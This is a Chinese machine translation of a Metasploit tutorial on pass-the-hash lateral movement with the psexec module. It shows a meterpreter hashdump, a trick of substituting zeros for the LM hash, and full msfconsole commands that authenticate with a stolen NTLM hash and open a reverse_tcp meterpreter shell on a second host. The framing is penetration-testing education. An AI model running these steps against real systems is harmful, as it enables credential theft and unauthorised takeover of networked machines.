该PSEXEC模块是经常使用的渗透测试,以获得访问给定的系统,你已经知道的凭据。它由Sysinternals编写,并已集成到框架中。通常作为渗透测试人员,我们可以通过一些漏洞成功获得对系统的访问权,使用meterpreter来获取密码或其他方法(例如fgdump,pwdump或cachedump),然后使用Rainbowtables破解这些哈希值。
我们还有其他选择,例如通过iam.exe之类的工具传递哈希。在metasploit中使用psexec的一种很好的方法是它允许您自己输入密码,或者您可以只指定哈希值,而无需破解即可访问系统。让我们深入思考如何使用这种攻击来进一步渗透网络。首先,我们要破坏一个系统上具有管理员密码的系统,我们不需要破解它,因为psexec允许我们仅使用哈希值,该管理员帐户在域基础结构中的每个帐户上都是相同的。现在,我们可以在系统之间切换,而不必担心破解密码。需要注意的一件事是,如果仅NTLM可用(例如,其15+字符密码或通过GPO,它们仅指定NTLM响应),则只需将**** NOPASSWORD ****替换为32 0即可。 :
******NOPASSWORD*******:8846f7eaee8fb117ad06bdd830b7586c
将被替换为:
00000000000000000000000000000000:8846f7eaee8fb117ad06bdd830b7586c
在实验室中对此进行测试时,即使您使用的是正确的凭据,也可能会遇到以下错误:
STATUS_ACCESS_DENIED (Command=117 WordCount=0)
通过在目标系统上导航至注册表项“ HKEY_LOCAL_MACHINE \ System \ CurrentControlSet \ Services \ LanManServer \ Parameters”并将RequireSecuritySignature的值设置为“ 0”,可以解决此问题。
[*] Meterpreter session 1 opened (192.168.57.139:443 -> 192.168.57.131:1042) meterpreter > run post/windows/gather/hashdump [*] Obtaining the boot key... [*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6... [*] Obtaining the user list and keys... [*] Decrypting user keys... [*] Dumping password hashes... Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c::: meterpreter >
现在我们有了一个抄表器控制台并转储了哈希,让我们使用PSExec和仅哈希值连接到另一个受害者。
root@kali:~# msfconsole ## ### ## ## ## ## #### ###### #### ##### ##### ## #### ###### ####### ## ## ## ## ## ## ## ## ## ## ### ## ####### ###### ## ##### #### ## ## ## ## ## ## ## ## # ## ## ## ## ## ## ##### ## ## ## ## ## ## ## #### ### ##### ##### ## #### #### #### ### ## =[ metasploit v4.2.0-dev [core:4.2 api:1.0] + -- --=[ 787 exploits - 425 auxiliary - 128 post + -- --=[ 238 payloads - 27 encoders - 8 nops =[ svn r14551 updated yesterday (2012.01.14) msf > search psexec Exploits ======== Name Description ---- ----------- windows/smb/psexec Microsoft Windows Authenticated User Code Execution windows/smb/smb_relay Microsoft Windows SMB Relay Code Execution msf > use exploit/windows/smb/psexec msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(psexec) > set LHOST 192.168.57.133 LHOST => 192.168.57.133 msf exploit(psexec) > set LPORT 443 LPORT => 443 msf exploit(psexec) > set RHOST 192.168.57.131 RHOST => 192.168.57.131 msf exploit(psexec) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 192.168.57.131 yes The target address RPORT 445 yes Set the SMB service port SMBPass no The password for the specified username SMBUser Administrator yes The username to authenticate as Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique: seh, thread, process LHOST 192.168.57.133 yes The local address LPORT 443 yes The local port Exploit target: Id Name -- ---- 0 Automatic msf exploit(psexec) > set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c SMBPass => e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c msf exploit(psexec) > exploit [*] Connecting to the server... [*] Started reverse handler [*] Authenticating as user 'Administrator'... [*] Uploading payload... [*] Created \KoVCxCjx.exe... [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.57.131[\svcctl] ... [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.57.131[\svcctl] ... [*] Obtaining a service manager handle... [*] Creating a new service (XKqtKinn - "MSSeYtOQydnRPWl")... [*] Closing service handle... [*] Opening service... [*] Starting the service... [*] Removing the service... [*] Closing service handle... [*] Deleting \KoVCxCjx.exe... [*] Sending stage (719360 bytes) [*] Meterpreter session 1 opened (192.168.57.133:443 -> 192.168.57.131:1045) meterpreter > shell Process 3680 created. Channel 1 created. Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. C:\WINDOWS\system32>
这就对了!我们可以使用相同的凭据成功连接到另一台计算机,而不必担心Rainbowtables或破解密码。特别感谢Chris Gates提供了有关此文档的文档。